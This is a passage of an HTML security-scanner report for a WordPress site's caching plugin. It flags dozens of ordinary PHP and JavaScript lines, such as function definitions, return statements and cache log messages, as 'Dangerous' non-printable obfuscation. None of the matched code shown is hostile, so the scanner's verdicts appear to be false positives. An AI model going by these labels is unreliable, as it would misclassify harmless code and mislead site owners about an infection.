form.delete-line"</span><span style="color: #007700">).</span><span style="color: #0000BB">hide</span><span style="color: #007700">(); </span><span style="color: #0000BB">jQuery</span><span style="color: #007700">(</span><span style="color: #DD0000">"#delete-cache-h2"</span><span style="color: #007700">).</span><span style="color: #0000BB">hide</span><span style="color: #007700">(); </span><span style="color: #0000BB">jQuery</span><span style="color: #007700">(</span><span style="color: #DD0000">"#wpfc-cache-statics"</span><span style="color: #007700">).</span><span style="color: #0000BB">hide</span><span style="color: #007700">(); </span><span style="color: #0000BB">jQuery</span><span style="color: #007700">(</span><span style="color: #DD0000">"</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 100</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">called deleteCache</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 101</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">decodeVia</span><span style="color: #007700">(</span><span style="color: #0000BB">$data</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 102</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function == </span><span style="color: #DD0000">"setSchedule"</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 103</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"- Cache Timeout"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 104</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function == </span><span style="color: #DD0000">"optionsPageRequest"</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 105</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"- Delete Cache Button"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 106</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function == </span><span style="color: #DD0000">"deleteCssAndJsCache"</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 107</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"- Delete Cache and Minified CSS/JS Button"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 108</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function == </span><span style="color: #DD0000">"on_all_status_transitions"</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 111</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<span>- The "</span><span style="color: #007700">.</span><span style="color: #0000BB">$type</span><span style="color: #007700">.</span><span style="color: #DD0000">" has been updated</span><br><span>- #ID:"</span><span style="color: #007700">.</span><span style="color: #0000BB">$data</span><span style="color: #007700">-></span><span style="color: #0000BB">args</span><span style="color: #007700">[</span><span style="color: #0000BB">2</span><span style="color: #007700">]-></span><span style="color: #0000BB">ID</span><span style="color: #007700">.</span><span style="color: #DD0000">"</span><br><span>- One cached file has been removed</span>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 113</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<span>- New "</span><span style="color: #007700">.</span><span style="color: #0000BB">$type</span><span style="color: #007700">.</span><span style="color: #DD0000">" has been published</span><br><span>- "</span><span style="color: #007700">.</span><span style="color: #0000BB">$type</span><span style="color: #007700">.</span><span style="color: #DD0000">" ID:"</span><span style="color: #007700">.</span><span style="color: #0000BB">$data</span><span style="color: #007700">-></span><span style="color: #0000BB">args</span><span style="color: #007700">[</span><span style="color: #0000BB">2</span><span style="color: #007700">]-></span><span style="color: #0000BB">ID</span><span style="color: #007700">.</span><span style="color: #DD0000">"</span>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 115</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<span>- The "</span><span style="color: #007700">.</span><span style="color: #0000BB">$type</span><span style="color: #007700">.</span><span style="color: #DD0000">" status has been changed.</span><br><span>- "</span><span style="color: #007700">.</span><span style="color: #0000BB">$data</span><span style="color: #007700">-></span><span style="color: #0000BB">args</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">].</span><span style="color: #DD0000">" > "</span><span style="color: #007700">.</span><span style="color: #0000BB">$data</span><span style="color: #007700">-></span><span style="color: #0000BB">args</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">].</span><span style="color: #DD0000">"</span><span> #ID:"</span><span style="color: #007700">.</span><span style="color: #0000BB">$data</span><span style="color: #007700">-></span><span style="color: #0000BB">args</span><span style="color: #007700">[</span><span style="color: #0000BB">2</span><span style="color: #007700">]-></span><span style="color: #0000BB">ID</span><span style="color: #007700">.</span><span style="color: #DD0000">"</span>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 116</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function == </span><span style="color: #DD0000">"wp_set_comment_status"</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 118</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<span>- Comment has been marked as </span>"</span><span style="color: #007700">.</span><span style="color: #DD0000">"<span>"</span><span style="color: #007700">.</span><span style="color: #0000BB">$data</span><span style="color: #007700">-></span><span style="color: #0000BB">args</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">].</span><span style="color: #DD0000">"</span><br><span>- Comment ID: "</span><span style="color: #007700">.</span><span style="color: #0000BB">$data</span><span style="color: #007700">-></span><span style="color: #0000BB">args</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]-></span><span style="color: #0000BB">comment_ID</span><span style="color: #007700">.</span><span style="color: #DD0000">"</span><br><span>- One cached file has been removed</span>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 120</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<span>- Comment has been marked as </span>"</span><span style="color: #007700">.</span><span style="color: #DD0000">"<span>"</span><span style="color: #007700">.</span><span style="color: #0000BB">$data</span><span style="color: #007700">-></span><span style="color: #0000BB">args</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">].</span><span style="color: #DD0000">"</span><br><span>- Comment ID: "</span><span style="color: #007700">.</span><span style="color: #0000BB">$data</span><span style="color: #007700">-></span><span style="color: #0000BB">args</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">].</span><span style="color: #DD0000">"</span><br><span>- One cached file has been removed</span>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 122</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function == </span><span style="color: #DD0000">"clear_cache_after_woocommerce_checkout_order_processed"</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 124</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<span>- New item has been ordered</span><br><span>- Product ID: "</span><span style="color: #007700">.</span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">","</span><span style="color: #007700">, </span><span style="color: #0000BB">$data</span><span style="color: #007700">-></span><span style="color: #0000BB">args</span><span style="color: #007700">).</span><span style="color: #DD0000">"</span>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 128</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$data</span><span style="color: #007700">-></span><span style="color: #0000BB">function</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 131</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">printLogs</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 164</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 19</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">action</span><span style="color: #007700">(</span><span style="color: #0000BB">$from </span><span style="color: #007700">= </span><span style="color: #DD0000">""</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 25</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function = </span><span style="color: #DD0000">"- Cache Timeout / "</span><span style="color: #007700">.</span><span style="color: #0000BB">$from</span><span style="color: #007700">-></span><span style="color: #0000BB">prefix</span><span style="color: #007700">.</span><span style="color: #DD0000">" "</span><span style="color: #007700">.</span><span style="color: #0000BB">$from</span><span style="color: #007700">-></span><span style="color: #0000BB">content</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 44</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">updateDB</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 52</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setLogs</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 58</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getVia</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 62</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function</span><span style="color: #DD0000">"] == "</span><span style="color: #0000BB">wp_set_comment_status</span><span style="color: #DD0000">") && (</span><span style="color: #0000BB">$via</span><span style="color: #007700">[</span><span style="color: #0000BB">2</span><span style="color: #007700">]</span><span style="color: #DD0000">["</span><span style="color: #007700">function</span><span style="color: #DD0000">"] == "</span><span style="color: #0000BB">deleteHomePageCache</span><span style="color: #DD0000">") && (</span><span style="color: #0000BB">$via</span><span style="color: #007700">[</span><span style="color: #0000BB">3</span><span style="color: #007700">]</span><span style="color: #DD0000">["</span><span style="color: #007700">function</span><span style="color: #DD0000">"] == "</span><span style="color: #0000BB">singleDeleteCache</span><span style="color: #DD0000">")){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 63</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 66</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function</span><span style="color: #DD0000">"] == "</span><span style="color: #0000BB">clear_cache_after_woocommerce_checkout_order_processed</span><span style="color: #DD0000">"){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 68</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function</span><span style="color: #DD0000">"] = </span><span style="color: #0000BB">$via</span><span style="color: #007700">[</span><span style="color: #0000BB">4</span><span style="color: #007700">]</span><span style="color: #DD0000">["</span><span style="color: #007700">function</span><span style="color: #DD0000">"];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 79</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function</span><span style="color: #DD0000">"] == "</span><span style="color: #0000BB">on_all_status_transitions</span><span style="color: #DD0000">"){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 81</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function</span><span style="color: #DD0000">"] = </span><span style="color: #0000BB">$via</span><span style="color: #007700">[</span><span style="color: #0000BB">3</span><span style="color: #007700">]</span><span style="color: #DD0000">["</span><span style="color: #007700">function</span><span style="color: #DD0000">"];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 82</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function</span><span style="color: #DD0000">"] == "</span><span style="color: #0000BB">deleteCssAndJsCacheToolbar</span><span style="color: #DD0000">"){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 83</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function</span><span style="color: #DD0000">"] = "</span><span style="color: #0000BB">deleteCssAndJsCacheToolbar</span><span style="color: #DD0000">";</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 84</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function</span><span style="color: #DD0000">"] == "</span><span style="color: #0000BB">wp_set_comment_status</span><span style="color: #DD0000">")){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 86</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function</span><span style="color: #DD0000">"] = </span><span style="color: #0000BB">$via</span><span style="color: #007700">[</span><span style="color: #0000BB">7</span><span style="color: #007700">]</span><span style="color: #DD0000">["</span><span style="color: #007700">function</span><span style="color: #DD0000">"];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(</span><span style="color: #0000BB">$type</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 92</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function</span><span style="color: #DD0000">"] = </span><span style="color: #0000BB">$arr</span><span style="color: #007700">[</span><span style="color: #DD0000">"</span><span style="color: #0000BB">function</span><span style="color: #DD0000">"</span><span style="color: #007700">]</span><span style="color: #DD0000">." </span><span style="color: #007700">(</span><span style="color: #DD0000">".</span><span style="color: #0000BB">$plugin_name</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">]</span><span style="color: #DD0000">."</span><span style="color: #007700">)</span><span style="color: #DD0000">";</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 97</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$arr</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_513").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/wp-fastest-cache-premium/pro/library/widget-cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 4.46 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2020-04-01 16:41:44</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:37</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 9</span><br><table id="file_514" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">; } } </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 117</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 12</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">in_widget_form</span><span style="color: #007700">(</span><span style="color: #0000BB">$widget</span><span style="color: #007700">, </span><span style="color: #0000BB">$return</span><span style="color: #007700">, </span><span style="color: #0000BB">$instance</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 25</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">widget_update</span><span style="color: #007700">(</span><span style="color: #0000BB">$instance</span><span style="color: #007700">, </span><span style="color: #0000BB">$new_instance</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 36</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$instance</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 39</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">create_cache</span><span style="color: #007700">(</span><span style="color: #0000BB">$instance</span><span style="color: #007700">, </span><span style="color: #0000BB">$widget</span><span style="color: #007700">, </span><span style="color: #0000BB">$args</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">action</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 48</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">instance </span><span style="color: #007700">if </span><span style="color: #0000BB">not to cache widget</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_filter_admin</span><span style="color: #007700">(){</span>
</span>
